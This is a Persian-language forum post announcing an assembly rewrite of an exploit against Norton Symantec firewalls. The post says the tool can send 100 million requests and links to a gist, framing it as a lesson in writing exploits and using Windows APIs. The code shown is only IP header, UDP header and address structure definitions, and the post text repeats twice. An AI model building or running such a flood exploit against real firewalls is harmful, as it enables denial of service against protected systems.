farhad_shiri_ex
شنبه 07 تیر 1399, 09:02 صبح
نحوه استفاده از سوکت ها با استفاده از Windows API یکی از روش هایی می باشد، که کاربردهای زیادی دارد. یکی از این قبیل برنامه های کاربردی نوشتن اکسپلویت می باشد
اکسپلویت زیر بازنویسی شده یک اکسپلویت به زبان سی می باشد که به فایروال های Norton Symentec حمله میکند، لازم بذکر است که اکسپلویت قدیمی جهت ارسال تعداد زیادی رکوئست بهینه نبوده است ولی این اکسپلویت بازنویسی شده توانایی ارسال 100 میلیون رکوئست را دارد. البته هدف از قرار دادن این سورس نحوه نوشتن اکسپلویت و همچنین استفاده از API های استاندارد ویندوز در اسمبلی می باشد.
در صورتی که از دوستان تمایل به داشتن اطلاعات بیشتر راجع به این برنامه داشتند لطفا اعلام کنند.
https://gist.github.com/farhadshiri/b37fafe87e09178e8a606da12a867eea
;/* Define the IP header */
struct IP_HDR
ip_verlen db ? ;/* IP version & length */
ip_tos db ? ;/* IP type of service */
ip_ttl db ? ;/* Time to live */
ip_protocol db ? ;/* Protocol */
ip_totallength dw ? ;/* Total length */
ip_id dw ? ;/* Unique identifier */
ip_offset dw ? ;/* Fragment offset field */
ip_checksum dw ? ;/* IP checksum */
ip_srcaddr dd ? ;/* Source address */
ip_destaddr dd ? ;/* Destination address */
ends
_ipHdr IP_HDR
;/* Define the UDP header */
struct UDP_HDR
src_portno dw ? ;/* Source port number */
dst_portno dw ? ;/* Destination port number */
udp_length dw ? ;/* UDP packet length */
udp_checksum dw ? ;/* UDP checksum (optional) */
ends
struct in_addr
union
struct
struct
s_b1 db ?
s_b2 db ?
s_b3 db ?
s_b4 db ?
ends
struct
s_w1 dw ?
s_w2 dw ?
ends
S_addr dd ?
ends
ends
ends
اکسپلویت زیر بازنویسی شده یک اکسپلویت به زبان سی می باشد که به فایروال های Norton Symentec حمله میکند، لازم بذکر است که اکسپلویت قدیمی جهت ارسال تعداد زیادی رکوئست بهینه نبوده است ولی این اکسپلویت بازنویسی شده توانایی ارسال 100 میلیون رکوئست را دارد. البته هدف از قرار دادن این سورس نحوه نوشتن اکسپلویت و همچنین استفاده از API های استاندارد ویندوز در اسمبلی می باشد.
در صورتی که از دوستان تمایل به داشتن اطلاعات بیشتر راجع به این برنامه داشتند لطفا اعلام کنند.
https://gist.github.com/farhadshiri/b37fafe87e09178e8a606da12a867eea
;/* Define the IP header */
struct IP_HDR
ip_verlen db ? ;/* IP version & length */
ip_tos db ? ;/* IP type of service */
ip_ttl db ? ;/* Time to live */
ip_protocol db ? ;/* Protocol */
ip_totallength dw ? ;/* Total length */
ip_id dw ? ;/* Unique identifier */
ip_offset dw ? ;/* Fragment offset field */
ip_checksum dw ? ;/* IP checksum */
ip_srcaddr dd ? ;/* Source address */
ip_destaddr dd ? ;/* Destination address */
ends
_ipHdr IP_HDR
;/* Define the UDP header */
struct UDP_HDR
src_portno dw ? ;/* Source port number */
dst_portno dw ? ;/* Destination port number */
udp_length dw ? ;/* UDP packet length */
udp_checksum dw ? ;/* UDP checksum (optional) */
ends
struct in_addr
union
struct
struct
s_b1 db ?
s_b2 db ?
s_b3 db ?
s_b4 db ?
ends
struct
s_w1 dw ?
s_w2 dw ?
ends
S_addr dd ?
ends
ends
ends